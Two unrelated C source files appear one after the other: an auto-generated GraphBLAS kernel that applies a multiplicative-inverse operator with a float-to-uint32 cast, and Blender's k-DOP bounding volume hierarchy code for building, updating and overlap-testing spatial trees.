// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__minv_uint32_fp32
// op(A') function: GB_tran__minv_uint32_fp32
// C type: uint32_t
// A type: float
// cast: uint32_t cij ; GB_CAST_UNSIGNED(cij,aij,32)
// unaryop: cij = GB_IMINV_UNSIGNED (aij, 32)
#define GB_ATYPE \
float
#define GB_CTYPE \
uint32_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
float aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = GB_IMINV_UNSIGNED (x, 32) ;
// casting
#define GB_CASTING(z, x) \
uint32_t z ; GB_CAST_UNSIGNED(z,x,32) ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
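// For reference, a hand-expanded sketch (illustrative only) of what
// GB_CAST_OP (p, p) produces for this uint32_t <- float pairing:
//
//      float aij = Ax [p] ;                          // GB_GETA
//      uint32_t x ; GB_CAST_UNSIGNED (x, aij, 32) ;  // GB_CASTING
//      Cx [p] = GB_IMINV_UNSIGNED (x, 32) ;          // GB_OP on GB_CX(p)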
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_MINV || GxB_NO_UINT32 || GxB_NO_FP32)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__minv_uint32_fp32
(
uint32_t *restrict Cx,
const float *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__minv_uint32_fp32
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
BLI_kdopbvh.c | /*
*
* ***** BEGIN GPL LICENSE BLOCK *****
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
* The Original Code is Copyright (C) 2006 by NaN Holding BV.
* All rights reserved.
*
* The Original Code is: all of this file.
*
* Contributor(s): Daniel Genrich, Andre Pinto
*
* ***** END GPL LICENSE BLOCK *****
*/
/** \file blender/blenlib/intern/BLI_kdopbvh.c
* \ingroup bli
*/
#include <assert.h>
#include "MEM_guardedalloc.h"
#include "BLI_utildefines.h"
#include "BLI_kdopbvh.h"
#include "BLI_math.h"
#ifdef _OPENMP
#include <omp.h>
#endif
#define MAX_TREETYPE 32
#define DEFAULT_FIND_NEAREST_HEAP_SIZE 1024
typedef struct BVHNode
{
struct BVHNode **children;
struct BVHNode *parent; // some user-defined traversals need this
struct BVHNode *skip[2];
float *bv; // Bounding volume covering all child nodes, max 13 axes
int index; // face, edge, vertex index
char totnode; // how many child nodes are used, used for speedup
char main_axis; // Axis used to split this node
} BVHNode;
struct BVHTree
{
BVHNode **nodes;
BVHNode *nodearray; /* pre-alloc branch nodes */
BVHNode **nodechild; // pre-alloc children for nodes
float *nodebv; // pre-alloc bounding-volumes for nodes
float epsilon; /* epsilon is used for inflation of the k-dop */
int totleaf; // leafs
int totbranch;
char tree_type; // type of tree (4 => quadtree)
char axis; // kdop type (6 => OBB, 7 => AABB, ...)
char start_axis, stop_axis; // KDOP_AXES array indices according to axis
};
typedef struct BVHOverlapData
{
BVHTree *tree1, *tree2;
BVHTreeOverlap *overlap;
int i, max_overlap; /* i is number of overlaps */
int start_axis, stop_axis;
} BVHOverlapData;
typedef struct BVHNearestData
{
BVHTree *tree;
const float *co;
BVHTree_NearestPointCallback callback;
void *userdata;
float proj[13]; //coordinates projection over axis
BVHTreeNearest nearest;
} BVHNearestData;
typedef struct BVHRayCastData
{
BVHTree *tree;
BVHTree_RayCastCallback callback;
void *userdata;
BVHTreeRay ray;
float ray_dot_axis[13];
float idot_axis[13];
int index[6];
BVHTreeRayHit hit;
} BVHRayCastData;
////////////////////////////////////////////////////////////////////////
// Bounding Volume Hierarchy Definition
//
// Notes: From OBB up to 26-DOP --> all bounding volume types are possible, just choose the type below
// Notes: You have to choose the type at compile time at the moment
// Notes: You can choose the tree type --> binary, quad, octree; choose below
////////////////////////////////////////////////////////////////////////
static float KDOP_AXES[13][3] =
{ {1.0, 0, 0}, {0, 1.0, 0}, {0, 0, 1.0}, {1.0, 1.0, 1.0}, {1.0, -1.0, 1.0}, {1.0, 1.0, -1.0},
{1.0, -1.0, -1.0}, {1.0, 1.0, 0}, {1.0, 0, 1.0}, {0, 1.0, 1.0}, {1.0, -1.0, 0}, {1.0, 0, -1.0},
{0, 1.0, -1.0}
};
/*
* Generic push and pop heap
*/
#define PUSH_HEAP_BODY(HEAP_TYPE,PRIORITY,heap,heap_size) \
{ \
HEAP_TYPE element = heap[heap_size-1]; \
int child = heap_size-1; \
while(child != 0) \
{ \
int parent = (child-1) / 2; \
if(PRIORITY(element, heap[parent])) \
{ \
heap[child] = heap[parent]; \
child = parent; \
} \
else break; \
} \
heap[child] = element; \
}
#define POP_HEAP_BODY(HEAP_TYPE, PRIORITY,heap,heap_size) \
{ \
HEAP_TYPE element = heap[heap_size-1]; \
int parent = 0; \
while(parent < (heap_size-1)/2 ) \
{ \
int child2 = (parent+1)*2; \
if(PRIORITY(heap[child2-1], heap[child2])) \
--child2; \
\
if(PRIORITY(element, heap[child2])) \
break; \
\
heap[parent] = heap[child2]; \
parent = child2; \
} \
heap[parent] = element; \
}
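/* Minimal instantiation sketch (illustrative; the NodeDistance_push_heap /
 * NodeDistance_pop_heap pair further below follows the same pattern):
 *
 *   #define float_priority(a, b) ((a) < (b))
 *   static void float_push_heap(float *heap, int heap_size)
 *   PUSH_HEAP_BODY(float, float_priority, heap, heap_size)
 *   static void float_pop_heap(float *heap, int heap_size)
 *   POP_HEAP_BODY(float, float_priority, heap, heap_size)
 *
 * To push: store the new element at heap[heap_size - 1] (after growing
 * heap_size) and call push; to pop: read the minimum at heap[0], call pop,
 * then shrink heap_size by one.
 */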
#if 0
static int ADJUST_MEMORY(void *local_memblock, void **memblock, int new_size, int *max_size, int size_per_item)
{
int new_max_size = *max_size * 2;
void *new_memblock = NULL;
if(new_size <= *max_size)
return TRUE;
if(*memblock == local_memblock)
{
new_memblock = malloc( size_per_item * new_max_size );
memcpy( new_memblock, *memblock, size_per_item * *max_size );
}
else
new_memblock = realloc(*memblock, size_per_item * new_max_size );
if(new_memblock)
{
*memblock = new_memblock;
*max_size = new_max_size;
return TRUE;
}
else
return FALSE;
}
#endif
//////////////////////////////////////////////////////////////////////////////////////////////////////
// Introsort
// with permission deriven from the following Java code:
// http://ralphunden.net/content/tutorials/a-guide-to-introsort/
// and he derived it from the SUN STL
//////////////////////////////////////////////////////////////////////////////////////////////////////
//static int size_threshold = 16;
/*
* Common methods for all algorithms
*/
/*static int floor_lg(int a)
{
return (int)(floor(log(a)/log(2)));
}*/
/*
* Insertion sort algorithm
*/
static void bvh_insertionsort(BVHNode **a, int lo, int hi, int axis)
{
int i,j;
BVHNode *t;
for (i=lo; i < hi; i++)
{
j=i;
t = a[i];
while((j!=lo) && (t->bv[axis] < (a[j-1])->bv[axis]))
{
a[j] = a[j-1];
j--;
}
a[j] = t;
}
}
static int bvh_partition(BVHNode **a, int lo, int hi, BVHNode * x, int axis)
{
int i=lo, j=hi;
while (1)
{
while ((a[i])->bv[axis] < x->bv[axis]) i++;
j--;
while (x->bv[axis] < (a[j])->bv[axis]) j--;
if(!(i < j))
return i;
SWAP( BVHNode* , a[i], a[j]);
i++;
}
}
/*
* Heapsort algorithm
*/
#if 0
static void bvh_downheap(BVHNode **a, int i, int n, int lo, int axis)
{
BVHNode * d = a[lo+i-1];
int child;
while (i<=n/2)
{
child = 2*i;
if ((child < n) && ((a[lo+child-1])->bv[axis] < (a[lo+child])->bv[axis]))
{
child++;
}
if (!(d->bv[axis] < (a[lo+child-1])->bv[axis])) break;
a[lo+i-1] = a[lo+child-1];
i = child;
}
a[lo+i-1] = d;
}
static void bvh_heapsort(BVHNode **a, int lo, int hi, int axis)
{
int n = hi-lo, i;
for (i=n/2; i>=1; i=i-1)
{
bvh_downheap(a, i,n,lo, axis);
}
for (i=n; i>1; i=i-1)
{
SWAP(BVHNode*, a[lo],a[lo+i-1]);
bvh_downheap(a, 1,i-1,lo, axis);
}
}
#endif
static BVHNode *bvh_medianof3(BVHNode **a, int lo, int mid, int hi, int axis) // returns Sortable
{
if ((a[mid])->bv[axis] < (a[lo])->bv[axis])
{
if ((a[hi])->bv[axis] < (a[mid])->bv[axis])
return a[mid];
else
{
if ((a[hi])->bv[axis] < (a[lo])->bv[axis])
return a[hi];
else
return a[lo];
}
}
else
{
if ((a[hi])->bv[axis] < (a[mid])->bv[axis])
{
if ((a[hi])->bv[axis] < (a[lo])->bv[axis])
return a[lo];
else
return a[hi];
}
else
return a[mid];
}
}
#if 0
/*
* Quicksort algorithm modified for Introsort
*/
static void bvh_introsort_loop (BVHNode **a, int lo, int hi, int depth_limit, int axis)
{
int p;
while (hi-lo > size_threshold)
{
if (depth_limit == 0)
{
bvh_heapsort(a, lo, hi, axis);
return;
}
depth_limit=depth_limit-1;
p=bvh_partition(a, lo, hi, bvh_medianof3(a, lo, lo+((hi-lo)/2)+1, hi-1, axis), axis);
bvh_introsort_loop(a, p, hi, depth_limit, axis);
hi=p;
}
}
static void sort(BVHNode **a0, int begin, int end, int axis)
{
if (begin < end)
{
BVHNode **a=a0;
bvh_introsort_loop(a, begin, end, 2*floor_lg(end-begin), axis);
bvh_insertionsort(a, begin, end, axis);
}
}
static void sort_along_axis(BVHTree *tree, int start, int end, int axis)
{
sort(tree->nodes, start, end, axis);
}
#endif
//after a call to this function you can expect that:
// every node to the left of a[n] is smaller than or equal to it
// every node to the right of a[n] is greater than or equal to it
static int partition_nth_element(BVHNode **a, int _begin, int _end, int n, int axis)
{
int begin = _begin, end = _end, cut;
while(end-begin > 3)
{
cut = bvh_partition(a, begin, end, bvh_medianof3(a, begin, (begin+end)/2, end-1, axis), axis );
if(cut <= n)
begin = cut;
else
end = cut;
}
bvh_insertionsort(a, begin, end, axis);
return n;
}
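/* Illustrative example (hypothetical values): if the nodes' bv[axis] values
 * are {5, 1, 4, 2, 3}, then partition_nth_element(a, 0, 5, 2, axis) leaves
 * {1, 2} (in some order) in a[0..1], the value 3 at a[2], and {4, 5} in
 * a[3..4] -- the array need not end up fully sorted. split_leafs() below
 * calls this once per partition boundary.
 */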
//////////////////////////////////////////////////////////////////////////////////////////////////////
static void build_skip_links(BVHTree *tree, BVHNode *node, BVHNode *left, BVHNode *right)
{
int i;
node->skip[0] = left;
node->skip[1] = right;
for (i = 0; i < node->totnode; i++)
{
if(i+1 < node->totnode)
build_skip_links(tree, node->children[i], left, node->children[i+1] );
else
build_skip_links(tree, node->children[i], left, right );
left = node->children[i];
}
}
/*
* BVHTree bounding volumes functions
*/
static void create_kdop_hull(BVHTree *tree, BVHNode *node, float *co, int numpoints, int moving)
{
float newminmax;
float *bv = node->bv;
int i, k;
// don't init bounds for the moving case
if(!moving)
{
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
bv[2*i] = FLT_MAX;
bv[2*i + 1] = -FLT_MAX;
}
}
for(k = 0; k < numpoints; k++)
{
// for all Axes.
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
newminmax = dot_v3v3(&co[k * 3], KDOP_AXES[i]);
if (newminmax < bv[2 * i])
bv[2 * i] = newminmax;
if (newminmax > bv[(2 * i) + 1])
bv[(2 * i) + 1] = newminmax;
}
}
}
// depends on the BVH for each face already being built
static void refit_kdop_hull(BVHTree *tree, BVHNode *node, int start, int end)
{
float newmin,newmax;
int i, j;
float *bv = node->bv;
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
bv[2*i] = FLT_MAX;
bv[2*i + 1] = -FLT_MAX;
}
for (j = start; j < end; j++)
{
// for all Axes.
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
newmin = tree->nodes[j]->bv[(2 * i)];
if ((newmin < bv[(2 * i)]))
bv[(2 * i)] = newmin;
newmax = tree->nodes[j]->bv[(2 * i) + 1];
if ((newmax > bv[(2 * i) + 1]))
bv[(2 * i) + 1] = newmax;
}
}
}
// only supports the x,y,z axes at the moment
// but we should use a plain and simple function here for speed's sake
// (the returned value encodes 2*axis + 1, so main_axis = return_value / 2)
static char get_largest_axis(float *bv)
{
float middle_point[3];
middle_point[0] = (bv[1]) - (bv[0]); // x axis
middle_point[1] = (bv[3]) - (bv[2]); // y axis
middle_point[2] = (bv[5]) - (bv[4]); // z axis
if (middle_point[0] > middle_point[1])
{
if (middle_point[0] > middle_point[2])
return 1; // max x axis
else
return 5; // max z axis
}
else
{
if (middle_point[1] > middle_point[2])
return 3; // max y axis
else
return 5; // max z axis
}
}
// bottom-up update of a bvh node's BV
// joins the children into the parent BV
static void node_join(BVHTree *tree, BVHNode *node)
{
int i, j;
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
node->bv[2*i] = FLT_MAX;
node->bv[2*i + 1] = -FLT_MAX;
}
for (i = 0; i < tree->tree_type; i++)
{
if (node->children[i])
{
for (j = tree->start_axis; j < tree->stop_axis; j++)
{
// update minimum
if (node->children[i]->bv[(2 * j)] < node->bv[(2 * j)])
node->bv[(2 * j)] = node->children[i]->bv[(2 * j)];
// update maximum
if (node->children[i]->bv[(2 * j) + 1] > node->bv[(2 * j) + 1])
node->bv[(2 * j) + 1] = node->children[i]->bv[(2 * j) + 1];
}
}
else
break;
}
}
/*
* Debug and information functions
*/
#if 0
static void bvhtree_print_tree(BVHTree *tree, BVHNode *node, int depth)
{
int i;
for(i=0; i<depth; i++) printf(" ");
printf(" - %d (%ld): ", node->index, node - tree->nodearray);
for(i=2*tree->start_axis; i<2*tree->stop_axis; i++)
printf("%.3f ", node->bv[i]);
printf("\n");
for(i=0; i<tree->tree_type; i++)
if(node->children[i])
bvhtree_print_tree(tree, node->children[i], depth+1);
}
static void bvhtree_info(BVHTree *tree)
{
printf("BVHTree info\n");
printf("tree_type = %d, axis = %d, epsilon = %f\n", tree->tree_type, tree->axis, tree->epsilon);
printf("nodes = %d, branches = %d, leafs = %d\n", tree->totbranch + tree->totleaf, tree->totbranch, tree->totleaf);
printf("Memory per node = %ldbytes\n", sizeof(BVHNode) + sizeof(BVHNode*)*tree->tree_type + sizeof(float)*tree->axis);
printf("BV memory = %dbytes\n", MEM_allocN_len(tree->nodebv));
printf("Total memory = %ldbytes\n", sizeof(BVHTree)
+ MEM_allocN_len(tree->nodes)
+ MEM_allocN_len(tree->nodearray)
+ MEM_allocN_len(tree->nodechild)
+ MEM_allocN_len(tree->nodebv)
);
// bvhtree_print_tree(tree, tree->nodes[tree->totleaf], 0);
}
#endif
#if 0
static void verify_tree(BVHTree *tree)
{
int i, j, check = 0;
// check the pointer list
for(i = 0; i < tree->totleaf; i++)
{
if(tree->nodes[i]->parent == NULL)
printf("Leaf has no parent: %d\n", i);
else
{
for(j = 0; j < tree->tree_type; j++)
{
if(tree->nodes[i]->parent->children[j] == tree->nodes[i])
check = 1;
}
if(!check)
{
printf("Parent child relationship doesn't match: %d\n", i);
}
check = 0;
}
}
// check the leaf list
for(i = 0; i < tree->totleaf; i++)
{
if(tree->nodearray[i].parent == NULL)
printf("Leaf has no parent: %d\n", i);
else
{
for(j = 0; j < tree->tree_type; j++)
{
if(tree->nodearray[i].parent->children[j] == &tree->nodearray[i])
check = 1;
}
if(!check)
{
printf("Parent child relationship doesn't match: %d\n", i);
}
check = 0;
}
}
printf("branches: %d, leafs: %d, total: %d\n", tree->totbranch, tree->totleaf, tree->totbranch + tree->totleaf);
}
#endif
//Helper data and structures to build a min-leaf generalized implicit tree
//This code can easily be reduced (basically this is only a method to calculate pow(k, n) in O(1).. and stuff like that)
typedef struct BVHBuildHelper
{
int tree_type; //
int totleafs; //
int leafs_per_child [32]; //Min number of leafs that are achievable from a node at depth N
int branches_on_level[32]; //Number of nodes at depth N (tree_type^N)
int remain_leafs; //Number of leafs that are placed on the level that is not 100% filled
} BVHBuildHelper;
static void build_implicit_tree_helper(BVHTree *tree, BVHBuildHelper *data)
{
int depth = 0;
int remain;
int nnodes;
data->totleafs = tree->totleaf;
data->tree_type= tree->tree_type;
//Calculate the smallest tree_type^n such that tree_type^n >= num_leafs
for(
data->leafs_per_child[0] = 1;
data->leafs_per_child[0] < data->totleafs;
data->leafs_per_child[0] *= data->tree_type
);
data->branches_on_level[0] = 1;
//We could stop the loop first (but I am lazy to find out when)
for(depth = 1; depth < 32; depth++)
{
data->branches_on_level[depth] = data->branches_on_level[depth-1] * data->tree_type;
data->leafs_per_child [depth] = data->leafs_per_child [depth-1] / data->tree_type;
}
remain = data->totleafs - data->leafs_per_child[1];
nnodes = (remain + data->tree_type - 2) / (data->tree_type - 1);
data->remain_leafs = remain + nnodes;
}
// return the min index of all the leafs achievable from the given branch
static int implicit_leafs_index(BVHBuildHelper *data, int depth, int child_index)
{
int min_leaf_index = child_index * data->leafs_per_child[depth-1];
if(min_leaf_index <= data->remain_leafs)
return min_leaf_index;
else if(data->leafs_per_child[depth])
return data->totleafs - (data->branches_on_level[depth-1] - child_index) * data->leafs_per_child[depth];
else
return data->remain_leafs;
}
/**
* Generalized implicit tree build
*
* An implicit tree is a tree where its structure is implied, thus there is no need to store child pointers or indexes.
* It's possible to find the position of the child or the parent with simple math (multiplication and addition). This type
* of tree is for example used on heaps.. where node N has its children at indexes N*2 and N*2+1.
*
* Although in this case the tree type is general.. and not known until runtime.
* tree_type stands for the maximum number of children that a tree node can have.
* All tree types >= 2 are supported.
*
* Advantages of the used trees include:
*  - No need to store child/parent relations (they are implicit);
*  - Any node child always has an index greater than the parent;
*  - Brother nodes are sequential in memory;
*
*
* Some math relations derived for general implicit trees:
*
*   K = tree_type, ( 2 <= K )
*   ROOT = 1
*   N child of node A = A * K + (2 - K) + N, (0 <= N < K)
*
* Util methods:
*   TODO...
*   (looping elements, knowing if it's a leaf or not.. etc...)
*/
// This function returns the number of branches needed to hold the requested number of leafs.
static int implicit_needed_branches(int tree_type, int leafs)
{
return MAX2(1, (leafs + tree_type - 3) / (tree_type-1) );
}
/*
* This function handles the problem of "sorting" the leafs (along the split_axis).
*
* It arranges the elements in the given partitions such that:
* - any element in partition N is less than or equal to any element in partition N+1.
* - if all elements are different, each partition will get the same subset of elements
*   as if the array was sorted.
*
* partition P is described as the elements in the range ( nth[P] , nth[P+1] ]
*
* TODO: This can be optimized a bit by doing a specialized nth_element instead of K nth_elements
*/
static void split_leafs(BVHNode **leafs_array, int *nth, int partitions, int split_axis)
{
int i;
for(i=0; i < partitions-1; i++)
{
if(nth[i] >= nth[partitions])
break;
partition_nth_element(leafs_array, nth[i], nth[partitions], nth[i+1], split_axis);
}
}
/*
* This function builds an optimal implicit tree from the given leafs.
* Where optimal stands for:
* - The resulting tree will have the smallest number of branches;
* - At most one branch will have NULL children;
* - All leafs will be stored at level N or N+1.
*
* This function creates an implicit tree on branches_array, the leafs are given on the leafs_array.
*
* The tree is built per depth level: first branches at depth 1, then branches at depth 2, etc.
* The reason is that we can build level N+1 from level N without any data dependencies, which allows
* multithreaded building.
*
* To achieve this it is necessary to find how many leafs are accessible from a certain branch; BVHBuildHelper,
* implicit_needed_branches and implicit_leafs_index are auxiliary functions to solve that "optimal-split".
*/
static void non_recursive_bvh_div_nodes(BVHTree *tree, BVHNode *branches_array, BVHNode **leafs_array, int num_leafs)
{
int i;
const int tree_type = tree->tree_type;
const int tree_offset = 2 - tree->tree_type; //this value is 0 (on binary trees) and negative on the others
const int num_branches= implicit_needed_branches(tree_type, num_leafs);
BVHBuildHelper data;
int depth;
// set the root node's parent to NULL
BVHNode *tmp = branches_array+0;
tmp->parent = NULL;
//Most of bvhtree code relies on 1-leaf trees having at least one branch
//We handle that special case here
if(num_leafs == 1)
{
BVHNode *root = branches_array+0;
refit_kdop_hull(tree, root, 0, num_leafs);
root->main_axis = get_largest_axis(root->bv) / 2;
root->totnode = 1;
root->children[0] = leafs_array[0];
root->children[0]->parent = root;
return;
}
branches_array--; //Implicit trees use 1-based indexes
build_implicit_tree_helper(tree, &data);
//Loop tree levels (log N) loops
for(i=1, depth = 1; i <= num_branches; i = i*tree_type + tree_offset, depth++)
{
const int first_of_next_level = i*tree_type + tree_offset;
const int end_j = MIN2(first_of_next_level, num_branches + 1); //one past the last branch on this level
int j;
//Loop all branches on this level
#pragma omp parallel for private(j) schedule(static)
for(j = i; j < end_j; j++)
{
int k;
const int parent_level_index= j-i;
BVHNode* parent = branches_array + j;
int nth_positions[ MAX_TREETYPE + 1];
char split_axis;
int parent_leafs_begin = implicit_leafs_index(&data, depth, parent_level_index);
int parent_leafs_end = implicit_leafs_index(&data, depth, parent_level_index+1);
//This calculates the bounding box of this branch
//and chooses the largest axis as the axis to divide leafs
refit_kdop_hull(tree, parent, parent_leafs_begin, parent_leafs_end);
split_axis = get_largest_axis(parent->bv);
//Save split axis (this can be used on raytracing to speedup the query time)
parent->main_axis = split_axis / 2;
//Split the children along the split_axis; note: it's not needed to sort the whole leafs array,
//only to ensure that the elements are partitioned in a way that each child takes the elements
//it would take in case the whole array was sorted.
//split_leafs takes care of that "sort" problem.
nth_positions[ 0] = parent_leafs_begin;
nth_positions[tree_type] = parent_leafs_end;
for(k = 1; k < tree_type; k++)
{
int child_index = j * tree_type + tree_offset + k;
int child_level_index = child_index - first_of_next_level; //child level index
nth_positions[k] = implicit_leafs_index(&data, depth+1, child_level_index);
}
split_leafs(leafs_array, nth_positions, tree_type, split_axis);
//Setup children and totnode counters
//Not really needed but currently most of BVH code relies on having an explicit children structure
for(k = 0; k < tree_type; k++)
{
int child_index = j * tree_type + tree_offset + k;
int child_level_index = child_index - first_of_next_level; //child level index
int child_leafs_begin = implicit_leafs_index(&data, depth+1, child_level_index);
int child_leafs_end = implicit_leafs_index(&data, depth+1, child_level_index+1);
if(child_leafs_end - child_leafs_begin > 1)
{
parent->children[k] = branches_array + child_index;
parent->children[k]->parent = parent;
}
else if(child_leafs_end - child_leafs_begin == 1)
{
parent->children[k] = leafs_array[ child_leafs_begin ];
parent->children[k]->parent = parent;
}
else
break;
parent->totnode = k+1;
}
}
}
}
/*
* BLI_bvhtree api
*/
BVHTree *BLI_bvhtree_new(int maxsize, float epsilon, char tree_type, char axis)
{
BVHTree *tree;
int numnodes, i;
// there's no support for trees below binary trees :P
if(tree_type < 2)
return NULL;
if(tree_type > MAX_TREETYPE)
return NULL;
tree = (BVHTree *)MEM_callocN(sizeof(BVHTree), "BVHTree");
//tree epsilon must be >= FLT_EPSILON
//so that tangent rays can still hit a bounding volume..
//this bug would show up when casting a ray aligned with a kdop-axis and with an edge of 2 faces
epsilon = MAX2(FLT_EPSILON, epsilon);
if(tree)
{
tree->epsilon = epsilon;
tree->tree_type = tree_type;
tree->axis = axis;
if(axis == 26)
{
tree->start_axis = 0;
tree->stop_axis = 13;
}
else if(axis == 18)
{
tree->start_axis = 7;
tree->stop_axis = 13;
}
else if(axis == 14)
{
tree->start_axis = 0;
tree->stop_axis = 7;
}
else if(axis == 8) // AABB
{
tree->start_axis = 0;
tree->stop_axis = 4;
}
else if(axis == 6) // OBB
{
tree->start_axis = 0;
tree->stop_axis = 3;
}
else
{
MEM_freeN(tree);
return NULL;
}
//Allocate arrays
numnodes = maxsize + implicit_needed_branches(tree_type, maxsize) + tree_type;
tree->nodes = (BVHNode **)MEM_callocN(sizeof(BVHNode *)*numnodes, "BVHNodes");
if(!tree->nodes)
{
MEM_freeN(tree);
return NULL;
}
tree->nodebv = (float*)MEM_callocN(sizeof(float)* axis * numnodes, "BVHNodeBV");
if(!tree->nodebv)
{
MEM_freeN(tree->nodes);
MEM_freeN(tree);
return NULL;
}
tree->nodechild = (BVHNode**)MEM_callocN(sizeof(BVHNode*) * tree_type * numnodes, "BVHNodeBV");
if(!tree->nodechild)
{
MEM_freeN(tree->nodebv);
MEM_freeN(tree->nodes);
MEM_freeN(tree);
return NULL;
}
tree->nodearray = (BVHNode *)MEM_callocN(sizeof(BVHNode)* numnodes, "BVHNodeArray");
if(!tree->nodearray)
{
MEM_freeN(tree->nodechild);
MEM_freeN(tree->nodebv);
MEM_freeN(tree->nodes);
MEM_freeN(tree);
return NULL;
}
//link the dynamic bv and child links
for(i=0; i< numnodes; i++)
{
tree->nodearray[i].bv = tree->nodebv + i * axis;
tree->nodearray[i].children = tree->nodechild + i * tree_type;
}
}
return tree;
}
void BLI_bvhtree_free(BVHTree *tree)
{
if(tree)
{
MEM_freeN(tree->nodes);
MEM_freeN(tree->nodearray);
MEM_freeN(tree->nodebv);
MEM_freeN(tree->nodechild);
MEM_freeN(tree);
}
}
void BLI_bvhtree_balance(BVHTree *tree)
{
int i;
BVHNode* branches_array = tree->nodearray + tree->totleaf;
BVHNode** leafs_array = tree->nodes;
//This function should only be called once (it is a serious bug if it gets called more than once per tree)
assert(tree->totbranch == 0);
//Build the implicit tree
non_recursive_bvh_div_nodes(tree, branches_array, leafs_array, tree->totleaf);
//current code expects the branches to be linked to the nodes array
//we perform that linkage here
tree->totbranch = implicit_needed_branches(tree->tree_type, tree->totleaf);
for(i = 0; i < tree->totbranch; i++)
tree->nodes[tree->totleaf + i] = branches_array + i;
build_skip_links(tree, tree->nodes[tree->totleaf], NULL, NULL);
//bvhtree_info(tree);
}
int BLI_bvhtree_insert(BVHTree *tree, int index, float *co, int numpoints)
{
int i;
BVHNode *node = NULL;
// insert is only possible as long as tree->totbranch is 0
if(tree->totbranch > 0)
return 0;
if(tree->totleaf+1 >= MEM_allocN_len(tree->nodes)/sizeof(*(tree->nodes)))
return 0;
// TODO: check if we have enough nodes in the array
node = tree->nodes[tree->totleaf] = &(tree->nodearray[tree->totleaf]);
tree->totleaf++;
create_kdop_hull(tree, node, co, numpoints, 0);
node->index= index;
// inflate the bv with some epsilon
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
node->bv[(2 * i)] -= tree->epsilon; // minimum
node->bv[(2 * i) + 1] += tree->epsilon; // maximum
}
return 1;
}
// call before BLI_bvhtree_update_tree()
int BLI_bvhtree_update_node(BVHTree *tree, int index, float *co, float *co_moving, int numpoints)
{
int i;
BVHNode *node= NULL;
// check if index exists
if(index > tree->totleaf)
return 0;
node = tree->nodearray + index;
create_kdop_hull(tree, node, co, numpoints, 0);
if(co_moving)
create_kdop_hull(tree, node, co_moving, numpoints, 1);
// inflate the bv with some epsilon
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
node->bv[(2 * i)] -= tree->epsilon; // minimum
node->bv[(2 * i) + 1] += tree->epsilon; // maximum
}
return 1;
}
// call BLI_bvhtree_update_node() first for every node/point/triangle
void BLI_bvhtree_update_tree(BVHTree *tree)
{
//Update bottom=>top
//TRICKY: the way we build the tree, all children have an index greater than their parent
//This allows us to do a bottom-up update by starting from the bigger-numbered branches
BVHNode** root = tree->nodes + tree->totleaf;
BVHNode** index = tree->nodes + tree->totleaf + tree->totbranch-1;
for (; index >= root; index--)
node_join(tree, *index);
}
float BLI_bvhtree_getepsilon(BVHTree *tree)
{
return tree->epsilon;
}
/*
* BLI_bvhtree_overlap
*/
// overlap - is it possible for 2 bv's to collide ?
static int tree_overlap(BVHNode *node1, BVHNode *node2, int start_axis, int stop_axis)
{
float *bv1 = node1->bv;
float *bv2 = node2->bv;
float *bv1_end = bv1 + (stop_axis<<1);
bv1 += start_axis<<1;
bv2 += start_axis<<1;
// test all axes for min + max overlap
for (; bv1 != bv1_end; bv1+=2, bv2+=2)
{
if ((*(bv1) > *(bv2 + 1)) || (*(bv2) > *(bv1 + 1)))
return 0;
}
return 1;
}
static void traverse(BVHOverlapData *data, BVHNode *node1, BVHNode *node2)
{
int j;
if(tree_overlap(node1, node2, data->start_axis, data->stop_axis))
{
// check if node1 is a leaf
if(!node1->totnode)
{
// check if node2 is a leaf
if(!node2->totnode)
{
if(node1 == node2)
{
return;
}
if(data->i >= data->max_overlap)
{
// try to make alloc'ed memory bigger
data->overlap = realloc(data->overlap, sizeof(BVHTreeOverlap)*data->max_overlap*2);
if(!data->overlap)
{
printf("Out of Memory in traverse\n");
return;
}
data->max_overlap *= 2;
}
// both leafs, insert overlap!
data->overlap[data->i].indexA = node1->index;
data->overlap[data->i].indexB = node2->index;
data->i++;
}
else
{
for(j = 0; j < data->tree2->tree_type; j++)
{
if(node2->children[j])
traverse(data, node1, node2->children[j]);
}
}
}
else
{
for(j = 0; j < data->tree2->tree_type; j++)
{
if(node1->children[j])
traverse(data, node1->children[j], node2);
}
}
}
return;
}
